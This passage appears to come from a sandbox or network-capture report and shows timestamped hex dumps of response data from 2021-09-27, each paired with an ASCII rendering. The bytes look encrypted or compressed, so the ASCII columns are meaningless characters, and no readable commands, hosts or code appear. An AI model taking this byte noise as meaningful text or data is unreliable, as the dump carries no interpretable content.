e8 ec 77 2d 35 f5 8a 40 70 f4 76 ac 07 32 01 41 91 ca 09 ce db 94 d4 18 c0 aa cd 0b 80 d5 e0 c2 99 66 a3 b9 16 9d 32 f3 b7 ff bd 93 3a e7 db f3 31 6f da fd c7 f5 fa f7 d7 fc 11 18 6f 2a 9f 82 47 b7 ba 4c e5 ba 9d 13 fe b5 5c
                                          Data Ascii: yG<3+N,IeU<,8WLY|S$oj1[6Jv~#C2\(TB!amuB$TjyTdPUz><m{M_za\I"F0vi(`|@htQw-5@pv2Af2:1oo*GL\
                                          2021-09-27 15:30:10 UTC180INData Raw: 76 c2 dd 2d 4b b5 ec c4 5c 38 65 10 8e 12 94 5d 9a 20 d1 e5 f4 96 b3 66 88 2f f7 fb d9 83 63 9a a2 ac 28 f8 4c ef b0 cd fa 67 32 52 0d 68 b7 44 43 08 0b e6 16 1a a9 23 55 20 b0 00 21 74 8d 9e fe 06 25 bb 43 6e c2 13 9c 96 bb 93 2f 5f 57 7b 32 41 2b b7 f6 f3 37 40 92 40 b1 a7 34 3d 68 8b 0a 21 51 36 29 11 4c 5a 85 d1 42 38 ae 87 3c ae 8b 82 32 ab 19 c6 e7 6c af fc e8 93 78 20 6a 6d e5 78 18 58 d5 17 d0 ad 6b 0e a5 cd 8e 37 f3 27 87 e0 5d ec 3f 00 c7 67 16 8e e4 23 4c f2 30 3e 64 b9 2d a9 11 64 7e e1 79 3d d2 e9 a5 12 29 8f c4 a1 da 28 d3 2a 66 5f 74 c8 37 86 b2 a5 30 2c 39 79 9a 44 61 54 02 b2 a3 63 92 38 35 27 9f 25 f4 54 88 3e a0 ce c5 ea 0a 94 5d 95 c1 45 7f 61 a0 fd c0 ff 8e 50 e1 4c ab ce 34 4c 90 95 36 cd 00 10 ed fd 48 5d d7 f2 5e 1d 8c 59 73 57 47
                                          Data Ascii: v-K\8e] f/c(Lg2RhDC#U !t%Cn/_W{2A+7@@4=h!Q6)LZB8<2lx jmxXk7']?g#L0>d-d~y=)(*f_t70,9yDaTc85'%T>]EaPL4L6H]^YsWG
                                          2021-09-27 15:30:10 UTC182INData Raw: e8 b0 70 63 ef 37 6c 45 36 86 2a 48 21 5c 1a 24 f9 0d fb 11 4b a0 46 8b dc 06 b6 79 ff cd 45 63 18 6d a7 6d 86 2b 93 2c f9 a1 56 29 df 08 60 13 6e 28 3e d3 c4 85 ba b7 43 24 2e c1 fb 72 50 f0 81 19 91 59 01 d5 3b 3e 1e e5 19 65 86 64 f5 87 01 99 2e 24 ad de 33 f2 25 38 a2 37 da 8d 1b 76 70 7e c0 33 41 a7 59 4a bc bf 88 6c 07 54 3f fb 25 d4 6f e8 f5 0e e1 d2 44 d5 f9 f8 29 6a 94 cc 56 a9 0a 71 8e fe 99 77 78 80 28 b4 a4 cf 89 fe 0f 30 a8 bc bd e5 b7 f5 b1 a0 11 75 fc ba 94 52 cb 9d 3c 4a bb d7 cd 97 d0 fc a0 8b 13 38 30 3b 69 77 ac 69 ad e1 86 ad ba 52 e7 9a 50 f4 5d dd 35 05 74 bd 65 34 0c 3c d0 0b 54 15 84 49 8b 0f f4 e8 1e c2 2f 69 f3 6c d4 0d b3 cd 76 07 4f 01 55 23 c8 38 fd 3d 00 a9 eb 0f 70 cd 76 80 e3 52 c0 1f 60 45 2d 6b e6 ca 29 b7 82 bd cb 88 e5
                                          Data Ascii: pc7lE6*H!\$KFyEcmm+,V)`n(>C$.rPY;>ed.$3%87vp~3AYJlT?%oD)jVqwx(0uR<J80;iwiRP]5te4<TI/ilvOU#8=pvR`E-k)
                                          2021-09-27 15:30:10 UTC183INData Raw: 87 43 9e 2e 97 09 17 e6 a7 e8 65 41 6b d3 59 7a df 7e 6a ed 78 25 4a 3b eb 28 1e 9d 13 41 c6 3b b9 36 41 d5 65 5c 45 65 8c 36 10 52 47 7c b4 ac a4 98 37 b3 1b 88 91 4f f9 b8 87 85 0e df 83 51 59 4c 92 b0 12 42 65 ba 49 eb fc ca 52 d0 a9 0b 9b 16 1b 10 21 c0 24 56 94 5c 2d 48 3f fe 7b 25 98 fa 6c 32 33 7a 02 c6 0c f8 fe 57 06 32 05 92 b5 49 f7 d1 d4 ef c3 b1 09 34 40 68 ed b3 23 69 17 cf 85 31 a3 99 7f 42 45 ae 00 85 ac 62 86 d4 3f 64 ec af c2 af 81 e8 3b c1 22 02 4c 03 ec 65 e8 b9 b9 d0 d0 6b c4 1c cf 9d 32 15 b3 fa 42 d0 42 3f 7d c7 8c af 8c 61 07 aa 66 4d 1a cd 17 2d d4 11 69 d8 e3 3d 38 34 7d d8 c6 e7 21 c4 dc da 07 75 28 9a 78 92 5c 4a dc 45 0b 30 51 39 28 3c 46 0f 51 e4 26 de 62 82 97 35 5a 9f 57 52 56 24 13 46 5a b8 31 39 3b 5d e8 c1 d6 d9 63 38 f8
                                          Data Ascii: C.eAkYz~jx%J;(A;6Ae\Ee6RG|7OQYLBeIR!$V\-H?{%l23zW2I4@h#i1BEb?d;"Lek2BB?}afM-i=84}!u(x\JE0Q9(<FQ&b5ZWRV$FZ19;]c8
                                          2021-09-27 15:30:10 UTC184INData Raw: 7c 18 7a f7 f8 0e c8 06 6b a5 77 75 43 ab 68 19 8a c0 8f ed 4e 32 85 d8 b6 17 29 b8 bf 0e 24 0d 06 a6 82 6c 38 36 43 86 4a 1f 5f fc b0 84 1d 77 a4 4b dd 46 6d 70 04 a2 6f 19 59 38 e1 97 d8 a7 10 86 2c 3e 2e 8b a2 b0 bd a2 49 a8 a6 6e 55 3e fb 69 87 ae a0 a5 b0 53 38 32 c7 50 8d 81 50 3c 5b 9d d6 dd aa 63 8e 13 d7 86 19 f5 ed ac 9b 7f 33 4b 4a 4e 5b 39 8a a2 4a da 06 b6 74 b6 7d 26 a7 3c 32 0e f8 bc c2 88 c0 aa 56 80 ec c3 40 12 18 b1 bc e1 af 44 18 54 fa 39 6e 72 58 2b 64 99 c3 8e 83 99 98 d5 82 1d ad 42 5b f4 e4 86 82 a8 c1 bd f4 1d f7 8b a4 f7 e1 81 4d 4b e0 cb e0 3c 78 11 d5 04 8d 36 68 dd cf de 8a 30 46 69 24 06 6b c9 e5 60 39 c7 60 fc 29 50 89 5d a8 9f 07 d1 a6 83 a0 71 13 dd b8 54 68 84 df 21 0d 6c ec f8 56 52 35 95 df d4 70 b3 75 dc 05 bc 21 b3 b7
                                          Data Ascii: |zkwuChN2)$l86CJ_wKFmpoY8,>.InU>iS82PP<[c3KJN[9Jt}&<2V@DT9nrX+dB[MK<x6h0Fi$k`9`)P]qTh!lVR5pu!
                                          2021-09-27 15:30:10 UTC185INData Raw: 74 67 7e 57 98 de 5f d4 fc bf c4 e0 e5 0b 3a bd f2 62 49 8e 4f 23 63 63 e6 3a 11 1b f3 fa 4e 38 97 97 74 17 1e 77 ea 20 46 8d 47 24 48 05 c7 6a 90 78 3f 9b 39 1e 29 f8 09 6e 76 26 82 b9 4b 41 e9 b4 5e 3e 62 6a a2 6d 94 5b fa b4 d1 a4 c5 e6 b1 92 8a 77 db 84 d9 ab 03 0e a2 83 2e 88 4e b4 b9 f4 d6 18 32 18 6d fc b7 52 71 78 09 5b 14 fd 84 5c 55 4c d0 94 21 2d 8b e9 e4 41 00 1e 6c 11 c2 13 9c 01 bb 07 3c bb 55 07 32 05 04 a5 e6 f2 37 d6 92 d3 a7 40 36 40 68 fd 35 20 51 36 29 97 5c a7 b1 37 40 45 8e 00 13 ac 8b 82 12 3f 19 ec e6 8b 8d 80 e8 3b 57 23 4a 6f e5 ee 18 f8 c3 f3 d2 d0 6b c7 aa cd 8e 37 f3 b1 a7 46 5c 0a 3d 7f c7 8f 39 8c e4 22 6c 60 30 1a 63 5d 0f d0 11 69 4e f3 69 3e d2 7f a5 d6 38 6a c6 dc da 17 f3 2c 66 5f 74 4e 27 df b5 43 32 41 29 2b aa 46 61
                                          Data Ascii: tg~W_:bIO#cc:N8tw FG$Hjx?9)nv&KA^>bjm[w.N2mRqx[\UL!-Al<U27@6@h5 Q6)\7@E?;W#Jok7F\=9"l`0c]iNi>8j,f_tN'C2A)+Fa
                                          2021-09-27 15:30:10 UTC187INData Raw: 9f a0 4f a8 95 72 af d9 55 3d d4 f8 17 c5 d0 51 c3 26 16 a4 79 11 25 29 17 f4 a2 b8 94 ec fd b9 8b 79 03 10 07 f2 a4 06 cb d2 bc f2 fe 18 ae 71 ab 84 31 7c f7 2e 82 b0 0a 5f c4 d8 71 9f cf ad 47 a0 35 da 11 d2 28 9c 1a 2b f8 2b d0 37 49 44 47 0c f6 99 b5 a8 fe 16 5a a8 3d 2a a4 14 9c 8f ab 9f f8 95 73 16 dc f8 64 a0 65 1c 3f 22 fe f4 aa a4 43 13 2f af ca 50 51 6c 80 64 8f 93 02 b4 3a a5 3d 5d 1f 2a 85 03 fd 35 39 7a 2f fd bd a8 30 6a 09 80 b6 ac d8 cf 20 40 5f 8a c3 a4 43 06 79 bf be cb 8a f4 19 96 3f fa 27 4a 62 51 c4 e1 e1 87 69 16 c6 e3 2b 76 b1 4e 52 45 0d 39 a2 99 9d b1 41 ee 3b 94 a0 78 8b a1 0e f3 ae c0 bf 25 b8 de b5 99 13 0a eb 60 95 25 c8 52 37 4a 83 94 cf 05 d9 5d a4 ae 23 55 27 7b 6d ed 90 fc 87 b9 82 f2 ba 11 ec 35 53 40 5d 4f 0e 29 75 74 65
                                          Data Ascii: OrU=Q&y%)yq1|._qG5(++7IDGZ=*sde?"C/PQld:=]*59z/0j @_Cy?'JbQi+vNRE9A;x%`%R7J]#U'{m5S@]O)ute
                                          2021-09-27 15:30:10 UTC188INData Raw: 93 5e 26 73 4a 4c 56 e3 85 97 fa c2 47 d8 21 f2 8b 62 b2 45 ae be 79 fd b6 e3 33 5e 38 57 1e 4a 2c 7b d8 ce d5 d2 3a 67 3b ca e9 0c e5 e1 e2 2f 88 7b 06 70 f5 af fd ba cf 4d 83 1f 9e 72 90 c8 13 4f e5 88 6f 8d 61 14 5d 8f d2 4b 62 c1 7c 76 28 e3 e1 41 1a 81 04 96 c8 9c bf 7f 64 fa 22 0f 41 cf be 1c 14 05 5c b4 a5 db af f4 71 42 17 53 93 e8 f8 40 a2 5f 07 0b 83 63 17 71 99 a1 13 cf 49 f7 57 6c ff e1 5d 39 e5 78 9f 8e 28 66 28 d9 20 84 b3 32 2d 92 7c c8 5e 36 98 4d 68 f6 36 8f 00 8a 08 eb aa 7b 07 be 05 35 bd 36 f8 86 d6 40 c3 57 4a 3f 44 f5 de c2 28 78 37 e2 a0 5c a8 30 33 74 60 6e 00 92 a8 09 94 f6 3e 30 ed 68 84 b5 8d d1 39 4e 10 cd 65 54 ef 2c cd 13 f1 93 d1 f2 e0 d3 c3 1f 33 2c 9c e0 4e 35 09 66 51 47 80 c8 8e 43 39 dc 68 d9 18 73 71 87 d1 b0 6d 14 d3
                                          Data Ascii: ^&sJLVG!bEy3^8WJ,{:g;/{pMrOoa]Kb|v(Ad"A\qBS@_cqIWl]9x(f( 2-|^6Mh6{56@WJ?D(x7\03t`n>0h9NeT,3,N5fQGC9hsqm
                                          2021-09-27 15:30:10 UTC189INData Raw: 2d 12 77 31 28 12 c8 d6 4d 03 8c 2a cc ce 5c fb f6 ba 9c ff 1b 29 2e ee 31 97 63 27 14 a8 04 36 a2 79 2c 9d 50 d6 c4 03 9c c3 62 ff 8a b6 6e ff 3b 44 a0 d2 43 9c 57 fd 32 80 69 8c 79 2b ff 2f 9a 76 6a 38 70 e7 42 cd 6a 1f 89 3c 89 9e 38 23 85 b1 b2 1f 3e 91 b0 b9 22 39 23 e2 c4 e7 3e 93 4f 59 4b b0 5a 2e 97 39 1d 6f f1 ec d1 0f 6c 17 04 90 71 51 40 dc e7 08 ae b6 10 1f 2a 15 0c 34 ba cf b9 d0 5d b1 ee c5 53 f5 e0 f4 9b 0b b1 77 97 df 3a 75 92 cc 9e 90 4c fb 5f 02 c1 15 a9 0f 88 f4 a4 ca 05 a4 e9 98 a9 9f 20 fc 4c 80 5e b9 da 19 4c ee 23 74 68 51 7f f4 80 81 32 7d ad 1b e9 ad c4 f5 50 f5 f5 0d 41 4e 19 31 ce f1 b2 65 19 36 dc 33 77 6d 5a 44 43 d4 95 2d 85 ad bd 50 82 41 b4 f3 6a fc f9 cf d6 1e ce c7 e9 4f f7 85 85 02 e3 4d 4c 27 ba 80 e1 f8 78 7c e7 f4 9d
                                          Data Ascii: -w1(M*\).1c'6y,Pbn;DCW2iy+/vj8pBj<8#>"9#>OYKZ.9olqQ@*4]Sw:uL_ L^L#thQ2}PAN1e63wmZDC-PAjOML'x|
                                          2021-09-27 15:30:10 UTC191INData Raw: 86 3d f3 16 cf ed dd 40 57 c9 4d 3a f9 9e 31 db 9d ff c8 cf 7c e2 29 3a 5d 93 92 94 db bd d4 0a 39 fc ce f4 5d d9 d0 ec ee 84 42 76 b8 2f 55 26 71 ef 03 38 fc 97 cf 24 c6 80 5e 3e 7f 70 c3 76 6d 68 f8 48 c5 1f f0 f6 12 f1 f6 ca 00 6c 45 92 63 da fd f4 12 fc f9 0b 5e a6 e2 44 74 9c 0b a8 eb b4 41 5f 60 99 48 47 99 90 9f 26 3c 54 38 95 38 41 21 0a 7e f6 f8 a8 4b 60 e1 16 7b 56 65 c0 a1 0c b1 9a 9d da d0 0a eb e0 b1 0a 89 01 c1 85 df 92 62 29 8e 46 2b 72 4f d7 80 37 d0 04 30 49 07 14 b5 23 74 66 13 ec 3d ca 84 bc 66 68 9c bf 29 19 ae b8 fc 0f 24 ea 6d 8c c3 67 9d 72 ba ad 1a cd 54 74 33 98 03 d4 f6 af 05 59 be fa bf 75 13 d8 6b ac 2d 17 74 25 29 ce 44 97 94 f7 40 4b ae 0d 13 ac 8b 8c 32 2c 19 ec e6 98 ad 94 e8 07 55 2a 6a 74 e5 d2 1a e6 d3 dc d2 d0 6b cc 8a
                                          Data Ascii: =@WM:1|):]9]Bv/U&q8$^>pvmhHlEc^DtA_`HG&<T88A!~K`{Veb)F+rO70I#tf=fh)$mgrTt3Yuk-t%)D@K2,U*jtk
                                          2021-09-27 15:30:10 UTC192INData Raw: 9f ee 3c 94 bc f5 98 13 ea 68 35 f3 ca 94 c9 b1 cc 87 57 05 08 98 14 e6 bf 43 a1 2b 20 64 a4 46 98 6d 26 6d 15 7c 3a ca 4e 65 c3 6c 4a b3 46 5c e0 2b d5 6b da d4 85 70 23 08 9c c1 4f 8e 85 69 ac 58 56 d0 ff 81 14 4c d3 a0 e7 2a 17 16 7a 78 25 06 14 6d a0 2f 86 2d fe b9 89 13 2b 81 06 8a a6 9c e3 6b bd 88 fb 53 b6 ca aa de 35 2e ca f3 81 80 0c d8 ff 25 72 cf c9 a2 79 3b 34 aa 17 39 36 5f 18 bb f1 6e e9 f4 4b 9e 4c ee e6 41 b6 5d f3 90 57 a4 3c 4b b2 03 8b 69 a8 ae cb 02 44 71 ff e9 57 56 7e 8e 1e f4 ff ca b2 a6 43 e5 26 2b dc f4 5a 98 81 30 a2 42 01 20 33 b3 1e 76 14 9c 84 e1 fd cc 3a 85 27 0b ad 1f 3b 6a 08 89 a8 79 da 51 28 43 70 60 c9 9c 41 2c 55 97 be dc 81 fd 3c 48 36 c4 25 5c 66 55 c5 bf eb e0 44 4f ca ab 29 3d 9c 09 56 33 07 e3 8c 7b 91 ee 43 7a 20
                                          Data Ascii: <h5WC+ dFm&m|:NelJF\+kp#OiXVL*zx%m/-+kS5.%ry;496_nKLA]W<KiDqWV~C&+Z0B 3v:';jyQ(Cp`A,U<H6%\fUDO)=V3{Cz
                                          2021-09-27 15:30:10 UTC193INData Raw: a7 7a c2 65 cd 05 c9 d6 7a 9c 65 45 f1 1c 71 bd da 1f 2c e9 16 e4 23 93 88 77 48 48 66 83 61 ec c0 f4 c3 dd 1c 49 40 42 64 fd c2 10 ee af ec c9 f6 5e 06 15 a1 76 aa b3 17 d4 93 d4 33 19 4a c4 57 76 85 f5 f1 d0 43 44 12 9c 80 60 b6 73 8b 24 7c d1 b2 ca 25 e5 33 6b 1a 7c 09 ef dd 40 d4 fd 29 ed 30 fc ed 3a c0 d8 e3 37 8c 4e 23 48 f4 c7 f9 12 fd df 86 6d 9a c9 95 5b 16 3d e1 e8 65 71 6a 60 59 49 c6 a9 69 b5 78 3d 0d 0b ea 0f 1e 0a 13 45 c3 fa bb 49 41 dd 23 77 45 64 8c 95 11 bd 5d 98 b6 e7 a5 ee 70 b0 1b bf 90 f2 f9 db 83 5b 0d 8f 83 2f 1e 77 93 9d 12 d6 65 08 53 22 fe b6 52 4a ef 26 9b 14 1b ba 20 64 20 b1 96 1c 2c ba 78 fe 7b 1b 99 5f 6c c3 13 a3 01 88 0c 1f b9 15 07 07 05 05 b5 b7 f2 02 d6 90 c3 f5 40 01 40 69 ed 66 22 66 36 2b 87 08 a2 88 37 41 45 eb 01
                                          Data Ascii: zezeEq,#wHHfaI@Bd^v3JWvCD`s$|%3k|@)0:7N#Hm[=eqj`YIix=EIA#wEd]p[/weS"RJ& d ,x{_l@@if"f6+7AE
                                          2021-09-27 15:30:10 UTC194INData Raw: cd ce d0 36 b9 bd 22 56 2b 38 70 43 89 1f b4 b1 86 6a a3 0a e1 0d 52 f1 5d d7 09 59 75 52 64 54 0d 45 e4 86 50 22 83 85 b0 6c f3 87 19 e4 28 e4 f2 a0 de 41 b9 30 41 16 5f 26 45 cc da 47 dd 45 16 7c ff 60 58 0b 62 52 f7 18 d4 6b 72 ab 3a 79 fd 4c 0e 39 9c ad eb 25 c5 9b d3 0a da dd e9 40 36 52 a2 66 ae e0 32 74 03 34 3d 77 39 da 86 e7 c6 b8 8f 15 97 5e c2 2b 2d 2e 20 ca 35 90 f6 1a 4b e5 3e c1 03 ed 24 e1 60 ec 95 30 86 58 66 e4 6d af 6a c8 02 c8 c1 7a 92 1c 47 a4 50 73 ac da 1c 57 97 81 c7 21 92 ce 09 35 5b dd 97 63 f2 c1 e0 bc dc b9 46 43 57 64 fe 43 30 26 8a ee c8 f6 7e 84 02 97 53 ad 91 16 cc 16 d5 ad 0b 4c dd 14 75 02 d1 1e cc 41 45 51 b8 08 7b b3 41 88 02 3e cd 39 cb b7 f3 31 76 1a 7f ba c7 09 55 dc fc 6a c5 84 e3 b3 39 c1 f2 e2 17 4d 4f 22 4d f3 e6
                                          Data Ascii: 6"V+8pCjR]YuRdTEP"l(A0A_&EGE|`XbRkr:yL9%@6Rf2t4=w9^+-. 5K>$`0XfmjzGPsW!5[cFCWdC0&~SLuAEQ{A>91vUj9MO"M
                                          2021-09-27 15:30:10 UTC195INData Raw: aa fe fe b8 37 a7 de ce 2c 28 3b 0b 7d 8f c1 78 cf b7 6b 0d 56 05 2c 63 38 4a a0 4e 3c 1a a5 41 3d ee 32 ca a2 5d 05 a3 e2 da 45 a2 28 25 1e 74 1a 76 dc f0 02 32 17 78 28 ed 07 61 1c 43 24 c2 23 90 bc 76 5a fc 16 c4 32 c9 3e e7 3d b1 7c 62 16 2a 84 a4 90 26 0f c5 b3 a1 04 eb 8e e3 cc e8 b3 53 b9 a0 ff 77 cd 47 e3 99 a2 2d d7 a0 e2 3b 81 d2 3d 1c 25 2a ab 75 88 52 cb cd 42 29 40 d3 03 89 be cf 9f ff cc 19 f9 68 ed a0 f4 95 4e fb 88 d1 4d 94 54 c0 00 5a a1 55 1c ea e7 81 40 f3 64 a6 a3 35 9b 7b f6 da ca 2b 81 f4 dc fd 7a cb bc 92 db 38 a2 6f 35 d2 89 bf ab b6 cc a4 14 16 6c c7 14 e3 fc 50 c7 74 20 63 e7 6d f0 6a 26 a5 59 16 79 8f 0c 86 c2 04 09 f6 02 df e1 45 96 2e 9c 57 84 24 60 15 d4 62 4e c4 c6 2c ce 1b 54 a0 bc 9c 70 0f d1 ee a4 6f 71 76 78 c4 6d 43 7c
                                          Data Ascii: 7,(;}xkV,c8JN<A=2]E(%tv2x(aC$#vZ2>=|b*&SwG-;=%*uRB)@hNMTZU@d5{+z8o5lPt cmj&YyE.W$`bN,TpoqvxmC|
                                          2021-09-27 15:30:10 UTC196INData Raw: d5 28 f6 fc 59 ca bc 3e 92 f2 c1 f8 ac 8b b1 e9 a0 56 bb fc 05 c9 b4 a8 b8 3c 1a df d5 ae cf d0 0e f8 cf 47 86 32 20 31 24 f7 33 ad a3 df 3b f9 39 e1 38 0b 89 18 f1 09 41 2d bd 22 fb 0c 5b bb ed 37 31 84 bd ee 0d 97 b1 1e 30 76 35 90 d3 d6 16 ea 75 2d 5c 4f 43 0f b5 8b 53 ce 9f 58 d4 ae 8c 4c 89 2c 80 a4 9e c0 d1 3c a3 4e 4c e6 53 4f b5 e1 e7 cb 7a bf db 96 6b f9 bc 97 d0 74 a2 8a b0 e3 41 45 19 4b f3 61 22 4d e6 aa 94 a2 e9 d0 ac d6 30 b7 0e 73 56 20 9b 48 95 b5 3f 4a c6 5f 80 4a 8d 24 e4 00 87 d2 13 87 11 07 a7 0d a3 6a af 65 c9 a2 1b 93 01 26 f1 04 10 ac bc 7c 2c f0 77 f7 4b f3 88 6f 2d 2f 39 c5 00 86 a0 e1 b0 b9 68 09 05 36 10 9e c2 60 9d d7 98 ad 95 0b 62 66 e5 15 de f0 16 8a f6 a1 7c 58 21 b8 34 00 c1 b0 84 aa 43 15 60 d6 eb 1e d5 05 cf 63 09 ad b2
                                          Data Ascii: (Y>V<G2 1$3;98A-"[710v5u-\OCSXL,<NLSOzktAEKa"M0sV H?J_J$je&|,wKo-/9h6`bf|X!4C`c
                                          2021-09-27 15:30:10 UTC198INData Raw: c3 49 7e cd ec e7 32 6e 7c 82 82 c7 c8 f2 9b 5a 30 47 6a 20 84 87 74 a5 b6 82 a1 b1 0c a1 8a 8e ea 53 a1 d0 e9 25 39 0a 7e 0f a2 e8 5c e2 90 4a 2d 08 73 7b 00 37 4a d4 54 07 2a aa 17 4b bd 14 c0 c6 6a 0c a1 b5 b4 4e 8d 5e 09 34 11 5e 70 b9 c1 06 5c 27 50 5a c5 28 0c 31 6c 50 f5 03 e2 b7 56 38 f3 32 c4 1f cd 50 d5 35 a0 43 6c 10 33 8d c1 9f 0b 0a d3 8d af 1a ef ad 8f cf a9 fa 67 9d d2 fe 57 a1 69 fc 8c 96 2e de d5 db 31 8c d3 2e 11 3b 22 ca 66 84 49 fa c4 23 72 1c 8b 20 cc d9 8a c5 a6 97 42 a8 1f a9 f1 aa c3 32 b7 a7 86 13 c0 79 d5 22 0f 80 5b 3b c1 c0 d9 17 ca 74 d3 8f 03 f2 55 d1 8e f7 19 e4 f9 ff 93 58 e5 d9 d5 cb 5d 86 48 54 c0 ae f7 a8 9a a8 ab 33 16 4b f7 71 e7 ca 35 e9 57 4e 60 c9 08 98 6f 43 99 40 2e 4a ea 08 b7 ad 2a 02 97 28 f8 8d 65 d5 46 bb 7a
                                          Data Ascii: I~2n|Z0Gj tS%9~\J-s{7JT*KjN^4^p\'PZ(1lPV82P5Cl3gWi.1.;"fI#r B2y"[;tUX]HT3Kq5WN`oC@.J*(eFz
                                          2021-09-27 15:30:10 UTC199INData Raw: 59 35 4b b8 4a 2e 03 7d a6 9c 8a c0 2a 5a a3 89 4c 6a dc 2e 22 14 58 f2 ee d1 fc eb 33 ed 46 c7 c1 59 ce 81 4a 84 cf b2 cd 9b e5 84 d4 a0 52 8f 93 3e f4 b4 8d 89 4f 08 e8 a6 a8 97 84 18 d9 9f 43 ac 41 23 69 76 f5 1d c8 93 f5 5e ba 23 93 19 33 fd 38 a8 44 72 18 c9 0c c1 6d 60 96 a9 33 04 e1 b8 d6 79 91 e8 59 31 5b 7e 90 f3 b4 1f d2 07 2e 56 3b 60 21 d0 c8 4c aa b2 76 bb 99 94 3e a0 01 f3 82 a6 ac fc 35 d7 4e 62 83 31 51 d0 ee d8 bf 7b e5 bc 96 45 a6 99 ac be 44 8a e3 a3 e3 35 4e 07 58 fa 75 23 41 cd cb 93 ae fe ce ae c3 2e ab 09 59 7d 45 d9 7a c1 b7 0a 22 f0 5b e1 6b ad 50 d6 13 ee f7 07 f3 3c 66 e4 03 af 1a a4 68 ac b3 3d f6 0b 22 83 00 05 c9 be 5c 58 e3 64 9e 41 e7 fc 6d 48 1c 13 e8 05 b3 b5 95 b1 b5 7e 23 35 32 64 b7 a7 5c 9f f3 89 b1 81 10 75 66 e0 00
                                          Data Ascii: Y5KJ.}*ZLj."X3FYJR>OCA#iv^#38Drm`3yY1[~.V;`!Lv>5Nb1Q{ED5NXu#A.Y}Ez"[kP<fh="\XdAmH~#52d\uf
                                          2021-09-27 15:30:10 UTC200INData Raw: 69 45 6b 68 da 97 97 64 a2 e0 aa d9 26 36 07 0d 99 75 51 38 40 48 f3 29 f3 c3 58 26 2c c2 65 40 d8 f9 eb 5c 5a 19 af 89 e7 dd e0 9a 5e 04 56 18 04 8b 89 18 bc bc a2 a6 a2 02 aa ed cf c9 52 87 e2 f3 30 35 64 5a 7d 94 f9 5b ff 90 51 25 0a 57 1a 30 26 5c a0 74 04 60 a7 0b 5c a5 16 cb a1 28 3d a9 89 96 68 8d 4f 66 0b 1b 12 58 b2 d2 43 55 34 4d 77 cf 28 00 36 6e 41 ef 0d f7 de 44 3f eb 08 a1 38 e9 5c cc 3d 89 5e 6a 72 38 8d b5 89 02 10 c7 fd 82 01 8e 8c 8b aa ed db 34 bd c8 97 70 a5 00 c1 85 f4 0a d3 d5 ee 36 c8 de 33 73 1a 26 be 62 89 3d c1 e4 42 79 10 e7 23 a4 8b 98 c3 d2 99 4a b9 06 90 f5 b5 d4 0d b9 bb 86 37 c4 0a ee 43 2a 8a 7e 2a da d0 d0 3a ab 55 ce e1 31 f7 4d c7 b2 8e 24 e0 c5 f6 fd 5b ec c8 8a dc 40 8f 4e 40 c7 aa dd a5 91 9c a6 22 7e 08 c2 71 f2 f8
                                          Data Ascii: iEkhd&6uQ8@H)X&,e@\Z^VR05dZ}[Q%W0&\t`\(=hOfXCU4Mw(6nAD?8\=^jr84p63s&b=By#J7C*~*:U1M$[@N@"~q
                                          2021-09-27 15:30:10 UTC201INData Raw: bd 5b e9 4f 49 ad 2f 56 2f 57 8e c1 38 bb 6b 20 16 1d 7e a3 c8 41 56 31 ac d9 a7 fc 9f 75 22 5a 96 25 31 0a 6c 9a a1 97 ca 29 18 94 9b 5c 06 e0 1d 33 10 46 e3 e9 ee 99 ff 26 f6 77 f2 cd 35 ec b7 47 a5 de a4 d0 f4 c4 87 d4 d2 70 97 95 23 f6 e7 b0 93 48 1d ea d5 ab fa d0 0d cd cf 71 a7 5f 2b 0c 50 e2 02 ce a0 ea 5c d5 12 88 08 3a e4 5d e0 68 74 1c fc 09 c5 63 61 8b 99 3e 05 84 93 e3 7f 9d 85 1e 06 4e 5b 91 e5 bb 70 fa 36 38 7c 3f 75 3a e1 ba 68 a0 a8 64 bb 99 bb 4c 8a 18 f5 8e c4 82 f7 66 e0 41 16 a2 5f 15 f0 ec bd 8d 70 e5 9c 9d 31 b1 b4 cd 84 7c ba e5 b8 ea 50 7b 01 2a d6 67 0b 7b cd de 8b a2 d8 e1 be de 3d ac 6b 4e 67 20 ba 47 95 92 30 4a ce 5b ee 0f 8b 41 d6 3e d4 f6 00 e2 3c 08 a7 2f ad 1a b4 42 bb ae 17 c0 06 35 94 04 1f ac bd 78 58 c8 43 84 46 e0 dc
                                          Data Ascii: [OI/V/W8k ~AV1u"Z%1l)\3F&w5Gp#Hq_+P\:]htca>N[p68|?u:hdLfA_p1|P{*g{=kNg G0J[A></B5xXCF
                                          2021-09-27 15:30:10 UTC203INData Raw: 4c f5 60 72 f4 4e 3b 20 e3 e2 53 44 e5 1f bf 14 48 e8 0d 1e ab 60 f3 6e bb 5e 68 d7 55 61 57 71 5b f6 82 81 5b 9d f7 ba f3 2e 41 2e 68 8a 40 57 0e 65 41 ee 2a d7 fa 52 39 01 c1 77 7d ac ec e7 46 62 58 80 92 c1 c8 f8 ac 54 20 4c 6a 3e 8a 8d 73 8d a7 a2 ba a5 1f a0 e5 b8 e0 37 b1 de 87 01 33 0a 79 12 c7 c9 56 8c a2 4c 4c 23 5f 1a 2b 30 2f 97 7e 04 3e 82 0b 58 86 10 a5 85 47 19 bf 88 b5 07 82 47 66 3d 1b 5e 54 b3 b5 27 5d 51 5c 47 aa 21 04 20 5d 6d cd 04 ff de 7e 37 fe 30 a1 15 e7 5a c5 3b 8c 5f 6b 1d 5f ae a8 b3 23 07 e9 93 a6 06 8e 89 8a c6 cc fa 5a 9e cf 97 75 b8 6c f2 98 86 27 f2 bb e9 31 c8 fa 32 1f 32 11 af 73 92 54 ca e2 0b 72 1e 88 45 8b ee 8b fd b7 8c 5c a4 36 ae dd a8 c1 15 d6 9a 87 0d cc 18 ea 2a 13 84 67 33 c0 ca fc 1c ac 49 a6 92 12 e9 51 d5 b6
                                          Data Ascii: L`rN; SDH`n^hUaWq[[.A.h@WeA*R9w}FbXT Lj>s73yVLL#_+0/~>XGGf=^T']Q\G! ]m~70Z;_k_#Zul'122sTrE\6*g3IQ
